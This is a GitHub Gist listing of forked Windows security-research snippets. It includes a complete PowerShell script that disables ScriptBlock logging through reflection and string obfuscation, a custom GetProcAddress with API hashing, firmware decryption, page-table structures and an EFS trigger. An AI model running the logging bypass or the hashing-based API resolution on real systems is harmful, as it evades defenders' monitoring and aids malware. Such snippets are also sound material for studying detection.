Skip to content

Instantly share code, notes, and snippets.

@gavz
gavz / ScriptBlockLogBypass.ps1
Created June 17, 2024 21:10 — forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@gavz
gavz / CheckHvpt.c
Created June 17, 2024 20:54 — forked from tandasat/CheckHvpt.c
C code to check HVPT availability
#include <stdio.h>
#include <assert.h>
#include <Windows.h>
// Some of them taken (and modified) from https://github.com/winsiderss/systeminformer
typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION
{
BOOLEAN SecureKernelRunning : 1;
BOOLEAN HvciEnabled : 1;
@gavz
gavz / 0000-thecus-firmware-decrypt.sh
Created June 12, 2024 22:47 — forked from nstarke/0000-thecus-firmware-decrypt.sh
Thecus Firmware Decrypt Bash Script
#!/bin/bash
#
# This script takes a Thecus Firmware Image and decrypts it.
# The encryption key is based off of one of the supported
# models, which are listed in the firmware filename. This
# script will try all of the model names in the file name
# and delete any that do not decrypt to a gzip file.
#
# You will need the following c program compiled and passed
@gavz
gavz / log_and_scripts_api_resolving_with_x64dbg.md
Created May 30, 2024 23:28 — forked from a1ext/log_and_scripts_api_resolving_with_x64dbg.md
Log and scripts used in the following video [Resolving APIs dynamically with Labeless & x64dbg] https://youtu.be/hMWuWVRkpB0

Resolving APIs dynamically with Labeless & x64dbg

Previous part Resolving APIs dynamically with Labeless & OllyDbg2

Hi, now we try to do the same things using x64dbg with x64-bit target application...

Let's try to find out the difference we need to make in IDA python script...

As the base, I use the previous script (see video how to do the same in OllyDbg 2)

@gavz
gavz / get_proc_address.c
Created May 28, 2024 20:18 — forked from mr-r3bot/get_proc_address.c
Customized GetProcAddress and GetModuleHandle and handle redirected function with API hashing
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
{
SIZE_T Index = 0;
UINT32 Hash = 0;
SIZE_T Length = lstrlenA(String);
while (Index != Length)
{
Hash += String[Index++];
Hash += Hash << INITIAL_SEED;
@gavz
gavz / pml4e.c
Created May 13, 2024 22:22 — forked from mvankuipers/pml4e.c
Structure defining a PML4 entry in IA-32e paging.
typedef struct _PML4E
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PDPT.
@gavz
gavz / pdpte.c
Created May 13, 2024 22:22 — forked from mvankuipers/pdpte.c
Structure defining a page directory pointer table (PDPT) entry in IA-32e paging.
typedef struct _PDPTE
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PD.
@gavz
gavz / pde.c
Created May 13, 2024 22:21 — forked from mvankuipers/pde.c
Structure defining a page directory (PD) entry in IA-32e paging.
typedef struct _PDE
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PT.
@gavz
gavz / pte.c
Created May 13, 2024 22:21 — forked from mvankuipers/pte.c
Structure defining a page table (PT) entry in IA-32e paging.
typedef struct _PTE
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access the memory.
@gavz
gavz / main.c
Created May 12, 2024 21:19 — forked from dadevel/main.c
EFS Trigger
#include <windows.h>
int main() {
HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ENCRYPTED|FILE_FLAG_DELETE_ON_CLOSE, NULL);
if (!file || file == INVALID_HANDLE_VALUE) {
return GetLastError();
}
CloseHandle(file);
return 0;
}